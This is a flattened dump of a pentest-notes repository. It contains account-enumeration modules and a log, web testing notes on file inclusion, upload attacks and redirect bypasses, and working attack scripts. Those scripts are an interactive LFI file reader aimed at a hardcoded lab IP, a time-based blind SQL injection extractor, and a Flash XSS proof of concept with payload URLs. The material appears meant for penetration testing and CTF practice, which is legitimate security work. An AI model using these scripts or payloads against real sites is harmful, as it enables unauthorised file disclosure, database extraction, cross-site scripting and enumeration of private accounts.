Why not 14 | 10/13/2012 15 | 1 16 | WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/stumbleupon_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | stumbleupon.com (Username) 6 | /]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Interests 13 | we can't find the page 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/twitter.com_email_phone.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Twitter.com (Email/Phone) 5 | &value=]]> 6 | GET 7 | 8 | Accept-Language: en-gb 9 | False 10 | False 11 | Looks good! 12 | Email or phone is invalid 13 | 13/09/2012 14 | 2 15 | CJR 16 | social 17 | 18 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/twitter.com_username.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Twitter.com (username) 5 | &value=]]> 6 | GET 7 | 8 | Accept-Language: en-gb 9 | False 10 | False 11 | Looks good! 
12 | Username is invalid 13 | 13/09/2012 14 | 2 15 | CJR 16 | social 17 | 18 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/wefollow_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | wefollow.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Followers 13 | the page you are looking for does not exist 14 | 10/13/2012 15 | 1 16 | WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/xing.com.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | xing.com 5 | 6 | POST 7 | ]]> 8 | Accept-Language: en-gb,X-Requested-With: XMLHttpRequest 9 | False 10 | False 11 | already registered 12 | 13 | 13/09/2012 14 | 2 15 | CJR 16 | social 17 | 18 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/webmail/gmail_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | GMail (username) 6 | 7 | POST 8 | ","FirstName":"","LastName":""},"Locale":"en"}]]> 9 | Content-Type: application/json; charset=UTF-8,Accept-Language: en-us 10 | Someone already has that username 11 | "Valid":"true" 12 | 08/10/2012 13 | 1 14 | CJR 15 | email 16 | 17 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/webmail/hushmail.xml: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | Hushmail (hushmail.com email) 8 | 9 | POST 10 | &hush_domain=hushmail.com]]> 11 | Accept-Language: en-us 12 | ]]> 13 | 09/10/2012 14 | 1 15 | CJR 16 | email 17 | 18 | 19 | Hushmail (hushmail.me email) 20 | 21 | POST 22 | &hush_domain=hushmail.me]]> 23 | 
Accept-Language: en-us 24 | ]]> 25 | 09/10/2012 26 | 1 27 | CJR 28 | email 29 | 30 | 31 | Hushmail (hush.com email) 32 | 33 | POST 34 | &hush_domain=hush.com]]> 35 | Accept-Language: en-us 36 | ]]> 37 | 09/10/2012 38 | 1 39 | CJR 40 | email 41 | 42 | 43 | Hushmail (hush.ai email) 44 | 45 | POST 46 | &hush_domain=hush.ai]]> 47 | Accept-Language: en-us 48 | ]]> 49 | 09/10/2012 50 | 1 51 | CJR 52 | email 53 | 54 | 55 | Hushmail (mac.hush.com email) 56 | 57 | POST 58 | &hush_domain=mac.hush.com]]> 59 | Accept-Language: en-us 60 | ]]> 61 | 09/10/2012 62 | 1 63 | CJR 64 | email 65 | 66 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/webmail/yahoo_email.xml: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | Yahoo (yahoo.com email) 8 | @yahoo.com&ApiName=ValidateFields&intl=us]]> 9 | GET 10 | Accept-Language: en-gb 11 | "ErrorCode":"100000" 12 | "ResultCode":"SUCCESS" 13 | Empty response from server 14 | Blocking reported using this module, wait time suggested 15 | 08/10/2012 16 | 1 17 | CJR 18 | email 19 | 20 | 21 | Yahoo (ymail.com email) 22 | @ymail.com&ApiName=ValidateFields&intl=us]]> 23 | GET 24 | Accept-Language: en-gb 25 | "ErrorCode":"100000" 26 | "ResultCode":"SUCCESS" 27 | Empty response from server 28 | Blocking reported using this module, wait time suggested 29 | 08/10/2012 30 | 1 31 | CJR 32 | email 33 | 34 | 35 | Yahoo (rocketmail.com email) 36 | @rocketmail.com&ApiName=ValidateFields&intl=us]]> 37 | GET 38 | Accept-Language: en-gb 39 | "ErrorCode":"100000" 40 | "ResultCode":"SUCCESS" 41 | Empty response from server 42 | Blocking reported using this module, wait time suggested 43 | 08/10/2012 44 | 1 45 | CJR 46 | email 47 | 48 | 49 | Yahoo (yahoo.co.uk email) 50 | @yahoo.co.uk&ApiName=ValidateFields&intl=uk]]> 51 | GET 52 | Accept-Language: en-gb 53 | "ErrorCode":"100000" 54 | "ResultCode":"SUCCESS" 55 | Empty response from server 56 | 
Blocking reported using this module, wait time suggested 57 | 08/10/2012 58 | 1 59 | CJR 60 | email 61 | 62 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/scythe.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/social_engineering/tools/scythe/scythe.ico -------------------------------------------------------------------------------- /social_engineering/tools/scythe/scythe_0.2.8.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/social_engineering/tools/scythe/scythe_0.2.8.exe -------------------------------------------------------------------------------- /social_engineering/tools/scythe/test.log: -------------------------------------------------------------------------------- 1 | Account exampleuser exists on facebook.com 2 | Account testuser exists on facebook.com 3 | Account test123 exists on facebook.com 4 | Account chris exists on facebook.com 5 | Account bill exists on facebook.com 6 | Account jimmy exists on facebook.com 7 | Account peter exists on facebook.com 8 | -------------------------------------------------------------------------------- /templates/PWKv1-REPORT.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/templates/PWKv1-REPORT.doc -------------------------------------------------------------------------------- /templates/pwkv1_report.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/templates/pwkv1_report.doc 
-------------------------------------------------------------------------------- /web_pentest/auxiliary_info.md: -------------------------------------------------------------------------------- 1 | # Auxiliary 2 | 3 | ## The vulns formerly known as “noise” 4 | 5 | - Content Spoofing or HTML injection 6 | - Referer leakage 7 | - missing security headers 8 | - path disclosure 9 | - clickjacking 10 | - ++ 11 | 12 | ## How to test a web app in n minutes 13 | 14 | How can you get maximum results within a given time window? 15 | 16 | ## Data Driven Assessment (diminishing return FTW) 17 | 18 | 1. Visit the search, registration, contact, password reset, and comment forms and hit them with your polyglot strings 19 | 2. Scan those specific functions with Burp’s built-in scanner 20 | 3. Check your cookie, log out, check cookie, log in, check cookie. Submit the old cookie and see if access is still granted. 21 | 4. Perform user enumeration checks on login, registration, and password reset. 22 | 5. Do a reset and see if: the password comes back in plaintext, uses a URL-based token, is predictable, can be used multiple times, or logs you in automatically 23 | 6. Find numeric account identifiers anywhere in URLs and rotate them for context change 24 | 7. Find the security-sensitive function(s) or files and see if they are vulnerable to non-auth browsing (IDORs), lower-auth browsing, CSRF, CSRF protection bypass, and see if they can be done over HTTP. 25 | 8. Directory brute-force with the top short list from SecLists 26 | 9. Check upload functions for alternate file types that can execute code (XSS or PHP/etc/etc) 27 | -------------------------------------------------------------------------------- /web_pentest/file_upload.md: -------------------------------------------------------------------------------- 1 | # Tactical Fuzzing - FI & Uploads 2 | 3 | ## Local file inclusion 4 | 5 | Core Idea: Does it (or can it) interact with the server file system?
6 | 7 | [Liffy](https://github.com/rotlogix/liffy) is new and cool here but you can also use [SecLists](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/JHADDIX_LFI.txt): 8 | 9 | ## Malicious File Upload 10 | 11 | This is an important and common attack vector in this type of testing. 12 | File upload functions need a lot of protection to be adequately secure. 13 | 14 | Attacks: 15 | - Upload unexpected file format to achieve code exec (swf, html, php, php3, aspx, ++) Web shells or... 16 | - Execute XSS via the same types of files. Images as well! 17 | - Attack the parser to DoS the site or XSS via storing payloads in metadata or file header 18 | - Bypass security zones and store malware on target site via file polyglots 19 | 20 | File upload attacks are a whole presentation. Try this one to get a feel for bypass techniques: 21 | - content type spoofing 22 | - extension trickery 23 | - [File in the hole! presentation](https://www.nds.rub.de/media/attachments/files/2012/11/File-in-the-hole.pdf) 24 | 25 | As referenced above, file polyglots can be used to store malware on servers! 26 | [See @dan_crowley's talk](http://goo.gl/pquXC2) 27 | [and @angealbertini's research](corkami.com) 28 | 29 | ## Remote file includes and redirects 30 | 31 | Look for any param with another web address in it. The same params from LFI can show up here too. 32 | 33 | Common blacklist bypasses: 34 | 35 | - escape "/" with "\/" or “//” with “\/\/” 36 | - try single "/" instead of "//" 37 | - remove http i.e.
"continue=//google.com" 38 | - “/\/\” , “|/” , “/%09/” 39 | - encode, slashes 40 | - ”./” CHANGE TO “..//” 41 | - ”../” CHANGE TO “....//” 42 | - ”/” CHANGE TO “//” 43 | 44 | Redirections Common Parameters or Injection points: 45 | - dest= 46 | - continue= 47 | - redirect= 48 | - url= (or anything with “url” in it) 49 | - uri= (same as above) 50 | - window= 51 | - next= 52 | 53 | RFI Common Parameters or Injection points: 54 | - File= 55 | - document= 56 | - Folder= 57 | - root= 58 | - Path= 59 | - pg= 60 | - style= 61 | - pdf= 62 | - template= 63 | - php_path= 64 | - doc= 65 | -------------------------------------------------------------------------------- /web_pentest/scripts/dir_run_gobuster.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "" 3 | go run main.go -u $1 -t 25 -k -w ../SecLists-master/Discovery/Web_Content/raft-large-directories-lowercase.txt -s 200 -fw -q -e 4 | go run main.go -u $1 -t 25 -k -w ../SecLists-master/Discovery/Web_Content/raft-large-files-lowercase.txt -s 200 -fw -q -e 5 | #go run main.go -u $1 -t 50 -k -w ../Top100000-RobotsDisallowed2.txt -s 200 -fw 6 | echo "" 7 | -------------------------------------------------------------------------------- /web_pentest/scripts/lfi_infile.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import base64 4 | 5 | 6 | while True: 7 | 8 | file = raw_input('$ ') 9 | resp = requests.get("http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=" + file) 10 | print resp.text 11 | m = re.search('(?<=\[\().*?(?=\)\])', resp.text) 12 | try: 13 | print base64.b64decode(m.group(0)) 14 | except: 15 | 'file does not exist or no permissions' 16 | -------------------------------------------------------------------------------- /web_pentest/scripts/sqli_timebased.py: 
-------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | chars = "abcdefghijklmnopqrstuvwxyz123456789*!$#/|&" 5 | 6 | for n in range(10): 7 | 8 | for i in range(1,21): 9 | 10 | for char in chars: 11 | r = requests.get("https://domain/ajs.php?buc=439'and+(select+sleep(10)+from+dual+where+\ 12 | substring((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()\ 13 | +limit+"+str(n)+",1),"+str(i)+",1)+like+'"+char+"')--+-") 14 | 15 | 16 | secs = r.elapsed.total_seconds() 17 | 18 | if secs > 10: 19 | print char, 20 | 21 | print "\n" 22 | -------------------------------------------------------------------------------- /web_pentest/xss.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/web_pentest/xss.png -------------------------------------------------------------------------------- /web_pentest/xss_actionscript: -------------------------------------------------------------------------------- 1 | package 2 | { 3 | import flash.display.Sprite; 4 | import flash.external.*; 5 | import flash.system.System; 6 | public class XSSProject extends Sprite 7 | { 8 | public function XSSProject() 9 | { 10 | flash.system.Security.allowDomain("*"); 11 | ExternalInterface.marshallExceptions = true; 12 | try { 13 | ExternalInterface.call("0);}catch(e){};"+root.loaderInfo.parameters.js+"///*PoC by Soroush Dalili @IRSDL - only for testing/educational purposes - He accepts no responsibility for any bad/malicious usage*/"); 14 | } catch(e:Error) { 15 | trace(e); 16 | } 17 | } 18 | } 19 | } 20 | 21 | 22 | 23 | ------ 24 | 25 | https://dl.dropboxusercontent.com/u/37776965/exessess.swf 26 | 27 | Examples: 28 | 29 | Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); 30 | 31 | IE8: 
http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} 32 | 33 | IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); 34 | --------------------------------------------------------------------------------